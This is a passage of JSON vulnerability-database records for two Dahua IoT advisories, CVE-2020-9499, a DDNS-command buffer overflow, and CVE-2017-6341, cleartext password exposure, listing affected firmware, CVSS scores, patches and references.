"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9499"
}
]
},
"cve": "CVE-2020-9499",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003798",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.4,
"id": "CNVD-2020-22979",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003798",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-9499",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003798",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-22979",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-553",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22979"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "NVD",
"id": "CVE-2020-9499"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down. Dahua The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9499"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "CNVD",
"id": "CNVD-2020-22979"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-9499",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003798",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-22979",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-553",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22979"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "NVD",
"id": "CVE-2020-9499"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
]
},
"id": "VAR-202004-1823",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22979"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22979"
}
]
},
"last_update_date": "2023-12-18T13:51:55.682000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DHCC-SA-202004-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
},
{
"title": "Patch for Multiple Dahua product buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/213931"
},
{
"title": "Multiple Dahua Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=115746"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22979"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "NVD",
"id": "CVE-2020-9499"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9499"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-9499"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "NVD",
"id": "CVE-2020-9499"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-22979"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"db": "NVD",
"id": "CVE-2020-9499"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22979"
},
{
"date": "2020-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"date": "2020-04-09T14:15:13.213000",
"db": "NVD",
"id": "CVE-2020-9499"
},
{
"date": "2020-04-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22979"
},
{
"date": "2020-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003798"
},
{
"date": "2021-04-19T14:57:26.277000",
"db": "NVD",
"id": "CVE-2020-9499"
},
{
"date": "2020-05-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua Classic buffer overflow vulnerability in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003798"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-553"
}
],
"trust": 0.6
}
}
VAR-201702-1055
Vulnerability from variot - Updated: 2023-12-18 13:34Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 send cleartext passwords in response to requests from the Web Page, Mobile Application, and Desktop Application interfaces, which allows remote attackers to obtain sensitive information by sniffing the network, a different vulnerability than CVE-2013-6117. This vulnerability CVE-2013-6117 Is a different vulnerability.A remote attacker could intercept your network and gain valuable information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. Dahua Security Multiple Products are prone to an information-disclosure vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-1055",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "smartpss",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "1.16.1"
},
{
"model": "camera",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "2.400.0000.28.r"
},
{
"model": "nvr",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0001.10"
},
{
"model": "camera",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2.400.0000.28.r 2016-03-29"
},
{
"model": "nvr",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "3.210.0001.10 2016-06-06"
},
{
"model": "smart pss",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "1.16.1 2017-01-19"
},
{
"model": "security dhi-hcvr7216a-s3",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "3.210.0001.102016-06-06"
},
{
"model": "security camera 2.400.0000.28.r",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2016-03-29"
},
{
"model": "security smartpss software",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "1.16.12017-01-19"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:smartpss_firmware:1.16.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:camera_firmware:2.400.0000.28.r:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6341"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrew Frahn.",
"sources": [
{
"db": "BID",
"id": "96456"
}
],
"trust": 0.3
},
"cve": "CVE-2017-6341",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-6341",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-02589",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-114544",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-6341",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-6341",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-02589",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201702-920",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-114544",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-6341",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"db": "VULHUB",
"id": "VHN-114544"
},
{
"db": "VULMON",
"id": "CVE-2017-6341"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 send cleartext passwords in response to requests from the Web Page, Mobile Application, and Desktop Application interfaces, which allows remote attackers to obtain sensitive information by sniffing the network, a different vulnerability than CVE-2013-6117. This vulnerability CVE-2013-6117 Is a different vulnerability.A remote attacker could intercept your network and gain valuable information. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. Dahua Security Multiple Products are prone to an information-disclosure vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"db": "BID",
"id": "96456"
},
{
"db": "VULHUB",
"id": "VHN-114544"
},
{
"db": "VULMON",
"id": "CVE-2017-6341"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-6341",
"trust": 3.5
},
{
"db": "BID",
"id": "96456",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201702-920",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-02589",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-114544",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-6341",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"db": "VULHUB",
"id": "VHN-114544"
},
{
"db": "VULMON",
"id": "CVE-2017-6341"
},
{
"db": "BID",
"id": "96456"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"id": "VAR-201702-1055",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"db": "VULHUB",
"id": "VHN-114544"
}
],
"trust": 1.60625
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02589"
}
]
},
"last_update_date": "2023-12-18T13:34:19.223000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HCVR7204/7208/7216A-S3",
"trust": 0.8,
"url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
},
{
"title": "Dahua DHI-HCVR7216A-S3 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99659"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-319",
"trust": 1.1
},
{
"problemtype": "CWE-200",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114544"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "NVD",
"id": "CVE-2017-6341"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/96456"
},
{
"trust": 1.8,
"url": "https://twitter.com/null_ku7/status/835649185168838657"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6341"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-6341"
},
{
"trust": 0.3,
"url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/319.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"db": "VULHUB",
"id": "VHN-114544"
},
{
"db": "VULMON",
"id": "CVE-2017-6341"
},
{
"db": "BID",
"id": "96456"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
